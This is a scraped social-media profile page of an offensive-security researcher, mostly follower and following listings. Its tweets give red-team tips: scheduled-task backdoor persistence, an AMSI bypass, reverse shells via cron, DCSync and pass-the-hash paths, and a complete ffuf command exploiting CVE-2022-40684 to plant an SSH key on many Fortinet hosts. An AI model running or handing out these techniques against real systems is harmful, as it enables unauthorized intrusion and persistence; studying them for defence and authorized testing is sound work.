Khalid Maina @cyb3rkh4l1d
Professional@( AppSec | ApiSec | NetSec | OffSec | InfoSec ). Enthusiast@(Robotics | MicroServices ). cyberkhalid.com Defense By Offense Joined December 2021-
Tweets297
-
Followers503
-
Following366
-
Likes407
Defend your network with $70 off this cybersecurity course bundle bleepingcomputer.com/offer/deals/de… bleepingcomputer.com/offer/deals/de…
The $5 Membership sale is now live! The sale lasts until July 17 23:59 UTC: account.shodan.io/billing/member
#CVE-2023-2982 #WordPress Social Login and Register authentication bypass🚩 FOFA Query: body="/wp-content/plugins/miniorange-login-openid" Link: enbeta.fofa.info/result?qbase64… Refer: lana.codes/lanavdb/2326f4… #cybersecurity #infosec #OSINT #FOFA #ThreatIntelligence
Platforms To Learn Cybersecurity #Cybersecurity #infosec #education #Hacked #Hacking #BugBounty
-> Establish persistence using schtasks. -> This will create a scheduled task to spawn backdoor.exe at 11:30. #infosec #cybersecuritytips #redteam
Another hit🔥 Tips: After removing the invited user, try to use the invitation link sent to the user. #bugbountytips #hackerone #infosec
The path is clear -> If you have GenericAll on a group, you can add yourself to the group -> If you have WriteDacl on a domain, You can execute Dcsync Attack to retrieve Account hashes. ->If you have hashes, you can execute Pass-The-Hash attack to gain access Simple #infosec
This is possible because any machine account with SERVER_TRUST_ACCOUNT flag set will have the Replications right. cyberkhalid.github.io/posts/machuser/
Shellcode will be executed by calling EnumPageFilesW() function with the pCallBackRoutine parameter set to the base address of the shellcode. #cybersecurity #infosec #redteaming #pentesting
CVE-2022-42983 anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens. cve.mitre.org/cgi-bin/cvenam…
Malware can use CreateThread() function from kernel32.dll library to execute a shellcode. #cybersecurity #infosec #offsec #redteaming #pentesting #windows
CVE-2022-40684 ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r
If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. This could lead to authentication bypass. cyberkhalid.github.io/posts/hheada/ #infosec
Pass the Ticket(Ptt) is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password. cyberkhalid.github.io/posts/ptt/ #cybersecurity
Since AmsiScanBuffer() function is responsible for checking the inputs for malicious content, We can modify the function to always return 0 regardless of whether or not the input is malicious. Since returning 0 simply means the function successfully scanned the inputs.
Everywhere #uber Good luck #dfir #csirt # bleepingcomputer.com/news/security/…
Once you got root access on any host, you can add any scheduled task. You could even just configure a task where every minute a reverse shell is sent to you. cyberkhalid.github.io/posts/pcron/ #redteam #cybersecurity #infosec
If we can change the configuration of a service, and at thesame time we can stop/start the service , then we can achieve Privilege Escalation if the service runs with a higher privileges. cyberkhalid.github.io/posts/winprivs… #cybersecurity #infosec #redteam #windows
Adversaries may leverage the Windows CreateThread function from Kernel32.dll to execute a malicious code within the virtual address space of the calling process. cyberkhalid.github.io/posts/createth… #cybersecurity #infosec #redteam #windows
If attacker is able to manipulate the ACL for AdminSDHolder, then those ACL will automatically be applied to all protected objects. #cybersecurity #infosec #pentesting #redteam #windows #activedirectory

Md Ismail Šojal �... @0x0SojalSec
31K Followers 5K Following Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project @AIStrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Shudough @ShudoughXC4UOs
45 Followers 5K Following
Doutaez @doutaez2474
128 Followers 7K Following I'm new to Twitter accounts so I tried the messaging feature and it's great to meet you.
TheresaLongman @TKo9fp7G8Htq1
69 Followers 7K Following
Butele Denis @ButeleDeni75393
1 Followers 100 Following
Faruq @Fblazzer
13 Followers 457 Following
UrsulaGibson @5bgfn9586dz66
38 Followers 4K Following
Peasarr @PeasarrKM47
42 Followers 3K Following
Linda @morokumash97317
79 Followers 7K Following
Echo @shimodaira37941
62 Followers 7K Following
Netetee @netetee67668
119 Followers 7K Following
NellyPhilemon @00klb63r4sWNd
72 Followers 7K Following
Naman Devnani @naman_devnani
415 Followers 7K Following Security Researcher | Purple Team | Bug Hunter | CTF Player | Science & Tech Enthusiast | R&D | All-Source Intelligence | CAP | DCSP | TTIA | BCDE | COL
Niraj Dhalani @niraj_dhalani
176 Followers 670 Following 🖥👨💻Computer Engineer | Bug hunter | Security Consultant | Synack Red Team
king 👑 @MusengeNg
124 Followers 3K Following
MerryLucius @4l9Mtr58J87zh
26 Followers 3K Following
Advik @Ad_vi_k
80 Followers 5K Following
JuliaJames @by7cMZ9dSJyxz
75 Followers 7K Following
Stene @Stene727837
97 Followers 7K Following
venki @venki7131424727
0 Followers 60 Following
Tihough @tihough65640
64 Followers 4K Following
3ohr @zohersadoun
18 Followers 464 Following 👩🏻💻 #RedTeam 👻 #BugHunter 🌟 #OSCP | #OSWP | #eWPTXv2 | #eMAPT | #CEH | #CASENet | #CTIA
reydome0 @reydome0
34 Followers 1K Following
Nitish Badole @ni30badole
76 Followers 2K Following
Theresa @theresa55riddel
315 Followers 3K Following
Ismael Valenzuela @aboutsecurity
19K Followers 9K Following VP Labs, Threat Research & Intel @AWNetworks ▪️ Ex @Foundstone @Intel @McAfee @BlackBerry▪️ SANS Author & Senior Instructor #GSE 132 ▪️ #SEC530 #ThinkRedActBlue
Payday @Ourpay_dayhq
17 Followers 122 Following
Muhammad Farhad Ansar... @fteagleeye1
699 Followers 3K Following Fundamentalist Muslim | Student | Bug Bounty Hunter
kazkiti(本Hacker/副... @kazkiti_ctf
6K Followers 7K Following Pentester, Security-Researcher, Bug-Hunter in Japan /CTF,SECCONCTF2019,2017finalist/OAuth,OIDC/CVE2020-5593(RCE)/将棋四段/米株(株価2倍×4回,3倍×2回)/FP保有/目標:釣り,ピアノ,料理の上達
Ajay Pawar 🇮🇳 @Ajaypawar023
406 Followers 4K Following 23 | Pentester | Security Researcher | Bug Bounty Hunter | Ethical Hacker | EHE | NDE | DFE | Cyber Security Enthusiast |
Moon_Walk @Moon_0_Walk
94 Followers 2K Following
Thridev Gajavelly @WhoIsThridev
58 Followers 599 Following Interned @viehgroup | CTF Player | Ethical Hacker | Cyber Security & SDR Enthusiast | BCA
Mr Abdullah @MrUnKnwn1241
121 Followers 613 Following I love Hacking | CTF | Bug Bounty Hunting | Nature
ayubuzuberi @ayubuzuberi3
33 Followers 662 Following
Brandon @O_M__N____I_
24 Followers 333 Following Food, Thought's, Tings, my cat (LCDR Moon Puller) Fly Fishing, Coffee, Maths, Macrame,Angels Fan ⚾ ect......mardiyan @mardiyanabufaiz
28 Followers 298 Following
Mir Razi Ali @MirRaziAli3
28 Followers 951 Following Cybersecurity Analyst, Vulnerability Management, Incident response, Security Researcher
DA$ @Das__2
7 Followers 197 Following
BLACKOUT @BLACK_OUT01011
10 Followers 81 Following Is your boy blackout, an ethical hacker and interested in wireless,reverse engineering and more hacking activities
Lohitaksh Nandan @NandanLohitaksh
48K Followers 4 Following Digital Locksmith | Building @EncryptArxx
Intigriti @intigriti
193K Followers 658 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Ben Sadeghipour @NahamSec
233K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Md Ismail Šojal �... @0x0SojalSec
31K Followers 5K Following Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project @AIStrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Abhishek Meena - {�... @aacle_
41K Followers 251 Following Co Founder & COO At https://t.co/mpHluWMzHS | Bug Hunter ✦ 🖊️ Tester
🇸🇦 Murtada Bin ... @0x_rood
27K Followers 332 Following Rood 👑 and no one else | Digital Nomad Lifestyle 💎
bugcrowd @Bugcrowd
187K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
HackerRats - Uncle Ra... @theXSSrat
154K Followers 945 Following Alone we survive, together we prosper. Are you with me? https://t.co/AfnDsVhqqA
Nepal News English @nepalnews_eng
37K Followers 1 Following Nepal News offers accurate and independent news with multi-sided perspectives on Nepal.
OccupytheWeb @three_cube
247K Followers 3K Following Pentester, Forensic investigator, and former college professor. Trained hackers at every branch of US military and intelligence. Visit me at https://t.co/G478wufszw
PentesterLab @PentesterLab
190K Followers 0 Following We make learning web hacking and security easier. Online systems, code review, videos & courses that can be used to understand, test and exploit bugs!
Dr. Maik Ro ➡️�... @maikroservice
19K Followers 713 Following ☠️ inactive account ☠️ - Training the next generation of Hackers over at bsky / linkedin / youtube 🏴☠️💜
Harsh Bothra @harshbothra_
43K Followers 741 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
InfoSec Community @InfoSecComm
52K Followers 636 Following Largest InfoSec publication with 62,000+ followers and 1M+ monthly views.
TryHackMe @RealTryHackMe
283K Followers 103 Following An online platform that makes it easy to break into and upskill in cyber security, all through your browser.
Iman Gurung @ImanGurung13
8K Followers 442 Following Computer Engineer, Ethical Hacker, Tatoo Lover, Blind xss king
Zhao DaShuai 东北�... @zhao_dashuai
217K Followers 4K Following 📝People's Armed Police Propaganda Bureau. 🖥️Propaganda should be offensive to our enemies. 📢All forms of media is propaganda, we're just more honest about it
Sayaan Alam @ehsayaan
9K Followers 969 Following Offensive Security Researcher, Pentester, Red Teamer and Bug Bounty Hunter | SRT Hero at @Synack Red Team | Hackerone - sayaanalam
Geegpay by Raenest @geegpay_hq
33K Followers 1 Following Global banking for Africa's Professionals. Built by @RaenestHQ. For faster help, use our mobile app's "Live Chat" feature.
PentesterLand @PentesterLandEn
3K Followers 73 Following WNMC Penetration Tester RedTeamer BugHunter Instagram: PentesterLand
Uncle K Esq @Supheey
10K Followers 3K Following Happily Married 💍♥️ Energy Law|Corporate|Climate Change|Sustainability CAC Agent Building @thereformedmencircle Chairman @gloriousquranfoundation
Dark Web Intelligence @DailyDarkWeb
138K Followers 0 Following Daily Dark Web dose from the dark side.
Hossam A. Mesbah 🇵... @m359ah
4K Followers 224 Following Sr. Security consultant | Bug bounty hunter https://t.co/tuKTyrFrWo | https://t.co/PGSwsav7HG | https://t.co/Z6BCawM3XF
Michael Saylor @saylor
4.6M Followers 761 Following #Bitcoin is https://t.co/KbbYe745r3 | $BTC Hodler | @Strategy Founder & Chairman | bio https://t.co/9Zlq0oHqyh | $MSTR $STRC $STRK $STRF $STRD https://t.co/mrY77fmh0K
Felix Hartmann @FelixOHartmann
19K Followers 1K Following Managing Partner @HartmannCap | Dystopian Author @darkagebook
ElonMoney @0xelonmoney
52K Followers 2K Following Analyzing charts on LTF/HTF and sharing my observations. Also, sometimes DeFi and Market Research. Weekly newsletter - https://t.co/WXfpYXaJ3V
𝕏 Bug Bounty Write... @bountywriteups
35K Followers 4K Following 🔍 Bug Bounty Hunter | Content Creator | Sharing cybersecurity write-ups & resources | AI | | by @piyush_supiy #bugbounty #bugbountytips
Julio Moreno @jjcmoreno
21K Followers 1K Following Head of Research @CryptoQuant_com | Data-driven analysis of Bitcoin and digital assets.
Arnold Osipov @osipov_ar
1K Followers 320 Following Security Researcher @Morphisec | Former - Check Point Research | RE, Malware & Threat hunting | Software Engineer.
Fabian Marquardt @marqufabi
504 Followers 804 Following CTI Analyst @ Deutsche Telekom Security. Open source. Open data. Tech geek. Tweets in 🇩🇪 and 🇬🇧. Views are my own.
Cryptolaemus @Cryptolaemus1
20K Followers 207 Following Where are mealybugs now!?! We is hungry and no one wants to play anymore. Where everyone at?
Myrtus @Myrtus0x0
8K Followers 707 Following Malware Researcher | Developer | @Cryptolaemus1 | @NVIDIA bsky: [email protected]
Threat Insight @threatinsight
11K Followers 218 Following @Proofpoint's insights on targeted attacks & the security landscape. Follow us on Bluesky: https://t.co/8OVfhotdeP
Tommy M (TheAnalyst) @ffforward
14K Followers 195 Following Threat Researcher @proofpoint | @Cryptolaemus1
BRICS News @BRICSinfo
1.7M Followers 3 Following We are an independent media company bringing you unparalleled coverage of all-things geo-politics & BRICS News in real-time.
Caido @CaidoIO
9K Followers 33 Following
ITMO University @itmo_uni
2K Followers 200 Following Welcome to ITMO, one of Russia’s leading STEM universities and a global talent hub for educators and researchers. The world’s only 7-time #ICPC champion!
HSE University @HSE_eng
4K Followers 300 Following Welcome to the official Twitter page of HSE University Russia. Твиты на русском языке – @SU_HSE
Solana @solana
3.5M Followers 3K Following The high performance network powering internet capital markets, payments, and crypto applications. ◎ X By @SolanaFndn
CoinGlass @coinglass_com
80K Followers 493 Following CoinGlass:Aggregated Derivative Exchange Data.Including Liquidation heatmap,Bitcoin Futures Open Interest, Funding Rates and Liquidations.
CryptoQuant.com @cryptoquant_com
277K Followers 29 Following Leading On-chain Data/Analytics Provider 💡 Insights: https://t.co/4soN6kP21x 🔔 Alerts: https://t.co/kINun4rMMM
Cointelegraph @Cointelegraph
2.8M Followers 1K Following Trusted crypto media since 2013 · News, research, podcasts & more · Explore: https://t.co/6IsiPge7RR
Vickie Li @vickieli7
32K Followers 196 Following Infosec nerd. Hacks and secures. Creates god awful infographics. Author of #BugBountyBootcamp. Security @instacart.
Th3g3nt3lman @Th3G3nt3lman
25K Followers 735 Following Risin' up out of the flames like a phoenix, Strainin' to carry the weight of my brain like a genius..
PinkDraconian @PinkDraconian
11K Followers 279 Following ▶️ YouTube: https://t.co/j2KvfZx6Un 💼 LinkedIn: https://t.co/1Ky1Jft7mj
Yunus Emre Öztaş @ynsmroztas
6K Followers 163 Following #BugBounty #Hunter #Python #Java #Dev #CyberSecurity #Android #GALATASARAY
NYSC NDHQ @officialnyscng
291K Followers 119 Following This is the Official X handle of the National Youth Service Corps (NYSC). Plot 416, Tigris Crescent off Aguiyi Ironsi Street, Maitama, Abuja.
Sky Danfo Driver 🛫... @CaptJamyl
244K Followers 377 Following Captain ~ Boeing 737, ERJ 135/145, F-100 •Aviation/Soccer Mentor •CEO JmdFoundation•@RealMadrid •My Posts❓not for the WEAK❗️•🅱️Kind♥️•Ex Boy •Youths dev
Abba Hikima @Abbahikima
12K Followers 407 Following A lawyer working to imbue environments with justice, freedom and reason.
Rodolfo Assis @RodoAssis
10K Followers 119 Following That #XSS and #WAF #bypass guy. @BRuteLogic @KN0X55
xss0r @xss0r
6K Followers 3K Following xss0r Deploying an alert box in a web app is like having a tiny pop-up comedian shout 'Surprise!' whenever you least expect it! #xss0r #ibrahimXSS #Blindxss0r
Nigeria Police Force @PoliceNG
2.7M Followers 163 Following Official Twitter account of The Nigeria Police Force | Complaints - @PoliceNG_CRU
Alh4zr3d @Alh4zr3d
24K Followers 276 Following Legal Criminal | Twitch cult leader | InfosecPrep founder | Lovecraft scholar | Soros mercenary | Spiritual cargo shorts wearer | Cthulhu fhtagn
Trickest @trick3st
11K Followers 17 Following Visualize, operate & scale everything offensive security in one-platform.
Brute Logic @BRuteLogic
63K Followers 280 Following #CyberSecurity | #XSS #SQLi #SSRF | #WAF #bypass | #hack2learn | @RodoAssis | @KN0X55 | https://t.co/SIanVGfIHN | https://t.co/GyZaXU7FX9
Patrik Fehrenbach @ITSecurityguard
31K Followers 285 Following rɪsˈpɒnsəbl dɪsˈkləʊʒə https://t.co/UKFhw5EBwf https://t.co/uCOkOOoNnP
XSS Payloads @XssPayloads
52K Followers 0 Following
TheMayor - Joe Helle @joehelle
28K Followers 51 Following U.S. Army Iraq & Afghanistan Veteran | Former Mayor | Penetration Tester | PPG Trike Pilot
Louis Nyffenegger @snyff
20K Followers 590 Following Founder/CEO/Trainer/Researcher/CVE archeologist @PentesterLab. Security engineer. Bugs are my own, not of my employer...
Vivek Ramachandran @vivekramac
26K Followers 5K Following Founder, SquareX (@getsquarex) | (exited) Founder, PentesterAcademy (@securitytube) - acquired by INE (@ine) | Defcon - Blackhat Speaker | Book Author